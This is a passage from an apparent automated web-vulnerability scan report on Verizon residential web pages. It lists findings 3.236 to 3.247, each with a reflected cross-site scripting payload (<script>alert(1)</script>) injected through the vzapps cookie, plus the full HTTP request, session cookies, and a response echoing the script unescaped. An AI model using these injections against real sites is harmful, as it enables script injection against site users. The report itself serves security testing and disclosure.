Set-Cookie: ContextInfo_State=TX7daef'><script>alert(1)</script>c934f3f7b2c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Internet Security Suite
</title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7DAEF'><SCRIPT>ALERT(1)</SCRIPT>C934F3F7B2C ' />
...[SNIP]...

3.236. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/TechnicalSupport/TechnicalSupport.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5db1'><script>alert(1)</script>7ef783c9f97 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5db1'><script>alert(1)</script>7ef783c9f97; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60724
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5db1'><script>alert(1)</script>7ef783c9f97; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Expert Care
</title><meta name="keywords" content="computer support, tech support, pc support, computer services, comp
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5DB1'><SCRIPT>ALERT(1)</SCRIPT>7EF783C9F97 ' />
...[SNIP]...

3.237. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fc1d'><script>alert(1)</script>57067391278 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fc1d'><script>alert(1)</script>57067391278; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 00:11:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fc1d'><script>alert(1)</script>57067391278; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FC1D'><SCRIPT>ALERT(1)</SCRIPT>57067391278 ' />
...[SNIP]...

3.238. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6c93f<script>alert(1)</script>ad59696c099 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6c93f<script>alert(1)</script>ad59696c099; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74630
Expires: Sat, 20 Nov 2010 00:12:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6c93f<script>alert(1)</script>ad59696c099; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6C93F<SCRIPT>ALERT(1)</SCRIPT>AD59696C099 </DIV>
...[SNIP]...

3.239. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload c1b7b<script>alert(1)</script>28eee026df0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc1b7b<script>alert(1)</script>28eee026df0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63717
Expires: Sat, 20 Nov 2010 00:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc1b7b<script>alert(1)</script>28eee026df0; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC1B7B<SCRIPT>ALERT(1)</SCRIPT>28EEE026DF0 </DIV>
...[SNIP]...

3.240. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63a3c'><script>alert(1)</script>03a48b9a52e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX63a3c'><script>alert(1)</script>03a48b9a52e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63721
Expires: Sat, 20 Nov 2010 00:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX63a3c'><script>alert(1)</script>03a48b9a52e; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX63A3C'><SCRIPT>ALERT(1)</SCRIPT>03A48B9A52E ' />
...[SNIP]...

3.241. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 5782f<script>alert(1)</script>042ef7a5b1d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5782f<script>alert(1)</script>042ef7a5b1d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65807
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5782f<script>alert(1)</script>042ef7a5b1d; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5782F<SCRIPT>ALERT(1)</SCRIPT>042EF7A5B1D </DIV>
...[SNIP]...

3.242. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9067c'><script>alert(1)</script>8e4bfe5a6f4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65811
Expires: Sat, 20 Nov 2010 00:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9067C'><SCRIPT>ALERT(1)</SCRIPT>8E4BFE5A6F4 ' />
...[SNIP]...

3.243. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b381b'><script>alert(1)</script>ce796c23fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb381b'><script>alert(1)</script>ce796c23fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70907
Expires: Sat, 20 Nov 2010 00:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXb381b'><script>alert(1)</script>ce796c23fc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB381B'><SCRIPT>ALERT(1)</SCRIPT>CE796C23FC ' />
...[SNIP]...

3.244. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload cb6db<script>alert(1)</script>2abfc7b8635 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcb6db<script>alert(1)</script>2abfc7b8635; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69363
Expires: Sat, 20 Nov 2010 00:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=TXcb6db<script>alert(1)</script>2abfc7b8635; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXCB6DB<SCRIPT>ALERT(1)</SCRIPT>2ABFC7B8635 </DIV>
...[SNIP]...

3.245. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e936<script>alert(1)</script>c5abaf729ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX3e936<script>alert(1)</script>c5abaf729ed; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78163
Expires: Sat, 20 Nov 2010 00:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX3e936<script>alert(1)</script>c5abaf729ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3E936<SCRIPT>ALERT(1)</SCRIPT>C5ABAF729ED </DIV>
...[SNIP]...

3.246. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab065'><script>alert(1)</script>e9047e9551f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab065'><script>alert(1)</script>e9047e9551f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 00:11:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=TXab065'><script>alert(1)</script>e9047e9551f; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB065'><SCRIPT>ALERT(1)</SCRIPT>E9047E9551F ' />
...[SNIP]...

3.247. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dd3b4<script>alert(1)</script>757b9633f3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
